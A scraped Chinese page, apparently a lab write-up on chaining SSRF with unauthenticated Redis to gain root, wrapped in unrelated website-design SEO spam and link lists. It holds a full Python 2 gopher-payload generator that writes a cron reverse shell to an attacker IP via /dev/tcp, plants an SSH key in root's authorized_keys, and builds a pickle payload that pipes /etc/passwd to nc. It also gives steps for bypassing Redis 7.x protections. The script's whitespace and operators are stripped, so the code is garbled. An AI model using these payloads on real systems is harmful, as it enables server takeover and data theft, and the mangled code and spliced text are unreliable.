当前位置: 首页 > news >正文

网站设计应该怎么做北京住房城乡建设网站

网站设计应该怎么做,北京住房城乡建设网站,23个超好玩的网页小游戏,微信小程序格泰网站建设目录 漏洞介绍 SSRF Redis未授权 利用原理 环境搭建 利用过程 rockylinux cron计划任务反弹shell 写公钥免密登录 ubuntu 写公钥免密登录 漏洞介绍 SSRF SSRF#xff08;server side request forgrey#xff09;服务端请求伪造#xff0c;因后端未过滤用户输入免密登录 ubuntu 写公钥免密登录 漏洞介绍 SSRF SSRFserver side request forgrey服务端请求伪造因后端未过滤用户输入导致攻击者可以利用服务器向由攻击者输入的任意地址发起HTTP请求。攻击者可以对内网脆弱组件redisphp-fpm发起攻击获取服务器权限 Redis未授权 Redis在低版本中未强制设置密码攻击者可以无需任何权限访问redis若redis未降权运行可获取服务器root权限 利用原理 原理即为攻击者通过SSRF访问内网或本地的redis6379端口如果刚好存在redis未授权即可getshell 环境搭建 原来的靶场环境Web-Hacking-Lab因为centos的停止维护用不了了我改成了rockylinux8的镜像类似centos操作系统 注意我是在外网的公网服务器上搭建的不保证国内可以搭建成功师傅们自行修改docker文件 链接https://pan.baidu.com/s/1-ebmTKaWGu3qeat5fK1iOw?pwdcate  提取码cate 利用过程 rockylinux 访问http://ip:2222 尝试file读取文件成功读取说明存在ssrf漏洞 尝试访问本地6379端口发现redis报错说明存在redis组件 cron计划任务反弹shell #!/usr/bin/python2 from __future__ import print_functionimport os import sys import base64 import urllib import pickle import subprocessdef generate_resp(command):res if isinstance(command, list):passelse:command command.split( )res *{}\n.format(len(command))for cmd in command:res ${}\n.format(len(cmd))res {}\n.format(cmd)return resdef get_public_ip():try:return subprocess.check_output([curl,-s,ident.me])except:return Nonedef generate_gopher(payload):final_payload gopher://127.0.0.1:6379/_{}.format(urllib.quote(payload))return final_payloaddef ssh_key_write(ssh_dir/root/.ssh):res pubkey_path /root/.ssh/id_rsa.pubif(not os.path.exists(pubkey_path)):print(Please Run : ssh-keygen -t rsa)exit(1)pubkey \n\n open(pubkey_path,r).read()res generate_resp(flushall)# res generate_resp(set 1 {}.format(pubkey))res generate_resp(set 1 {DUMMY}.format(DUMMYA * len(pubkey)))res generate_resp(config set dir {}.format(ssh_dir))res generate_resp(config set dbfilename authorized_keys)res generate_resp(save)res generate_resp(quit)res res.replace(A * len(pubkey),pubkey)res res.replace(\n,\r\n)print(generate_gopher(res))print()print()print()print(After payload executed, try ssh rootserver_hostname)print()def cron_write(ip, port8080, os_typecentos):if os_type centos:crontab_path /var/spool/cron/else:crontab_path /var/spool/cron/crontabscron_command \n\n*/1 * * * * /bin/bash -c sh -i /dev/tcp/{ip}/{port} 01\n\n.format(ipip, portport)res res generate_resp(flushall)res generate_resp(set 1 {DUMMY}.format(DUMMYA * len(cron_command)))res generate_resp(config set dir {}.format(crontab_path))res generate_resp(config set dbfilename root)res generate_resp(save)res generate_resp(quit)res res.replace(\n,\r\n)res res.replace(A * len(cron_command), cron_command)print(generate_gopher(res))class PickleExploit(object):def __reduce__(self):ip 127.0.0.1port 9091cmd cat /etc/passwd | nc {} {}.format(ip, port)return (os.system, (cmd,))def pickle_payload(key):res payload pickle.dumps(PickleExploit())res \r\nres generate_resp(set {} {}.format(key, base64.b64encode(payload)))res res.replace(\n, \r\n)print(generate_gopher(res).replace(gopher,http))if len(sys.argv) 2:print(cron or ssh or pickle)sys.exit(0)if sys.argv[1] cron:ip raw_input(Reverse IP ) or get_public_ip() or 127.0.0.1port raw_input(Port ) or 8080os_type raw_input(Centos/Ubuntu (Default Centos)) or centoscron_write(ipip,portport)if sys.argv[1] ssh:ssh_key_write()if sys.argv[1] pickle:key raw_input(Key name )pickle_payload(key) 利用python脚本生成payload注意是python2 抓包发送payload这里因为是post数据流可以urlencode也可以不用 可以看到redis返回ok 等待一分钟左右成功反弹root权限 进容器可以看到任务计划中成功写入反弹shell脚本 写公钥免密登录 同样利用python脚本生成payload ssh-keygen生成密钥 抓包发送payload可以看到redis返回ok 注意这里不要urlencode编码否则会出现下面这种情况 然后直接ssh登录成功登录注意这里的 -p 10025因为是容器的22端口映射到服务器上的10025端口 进容器查看.ssh目录发现的确写入了公钥 ubuntu 写公钥免密登录 探测6379端口是否存在发现redis返回报错信息 同样python生成payload 但是在发送时却遇到了问题 为此我在容器里redis-cli连接redis直接写入看看是否是redis的问题 果不其然是redis的问题 那为什么rockylinux没有问题 我查看了Dockerfile文件发现rockylinux使用的是5.0.5的redis版本 而ubuntu用的则是稳定版本 之后想起来redis有一个保护模式我尝试改成no然后重启redis仍然不行 查找其他博主的博客。尝试这两个命令仍然不行 config set protected-mode no config set slave-read-only no 发现可能是版本太高换个版本试试 换成6.2.9后直接设置成功没有报错 再试试高一点的 7.2.1版本发现也还是不行 说明redis在7.x版本中意识到了redis未授权对服务器的危害不允许用户再自定义被保护的配置路径 想要在7.x版本中复现可以修改redis配置文件的配置将下面的配置改为yes 再次发送payload 成功登录
http://www.dnsts.com.cn/news/132456.html

相关文章:

  • 重庆网站建设方案北京住房保障建设投资中心网站
  • 怎样做班级网站培训网站视频不能拖动怎么办
  • 手机怎么搭建属于自己的网站网上做调查网站有哪些
  • 使用tag的网站wordpress引用轮播图文件
  • iis 7.0 搭建网站里水哪里做有做网站
  • 阳信网站建设网站做游戏吗
  • 宁德商城网站建设上海人才网最新招聘信息
  • 李氏牛仔网站建设风格苏州姑苏发布最新公告
  • jq 网站头部广告代码银川市住房城乡建设局网站
  • 拖拽式网站建设费用施工企业的维保技术方案
  • 国美电器如何进行网站的建设与维护手机网站制作设计
  • 公司网站设计意见长沙市做网站公司排名
  • ftp怎么做网站的备份网站设计作业多少钱
  • 四川省中国建设银行招聘信息网站甘肃兰州事件
  • 外国建筑设计网站公司网页如何免费制作
  • 中国空间站图片绘画微信网站建设公司
  • 数字中国建设峰会 官方网站潍坊网站建设top
  • wordpress 思维导图seo优化检测
  • 什么是营销型的网站网站排名不稳定
  • 京东商城 网站建设图片展示模块网站做一个多少钱
  • cp网站开发搭建一个虚拟主机如何建多个网站代码
  • 网站做淘宝联盟可以发广告的100个网站
  • 企业网站建设方案如何嘉兴网站制作方案
  • 建行信用卡网站网站建设报价单格式
  • 网站怎么绑定织梦哪个网站服务器比较好
  • 无锡快速建设网站方法怎样做旅游公司的网站
  • 电子商务网站开发常见网站制作专业的公司叫什么
  • 做网站怎么实现在线支付最近最新在线观看免费高清完整版
  • 成都做网站的公司网站开发w亿玛酷1订制
  • 敬请期待图片素材合肥seo排名优化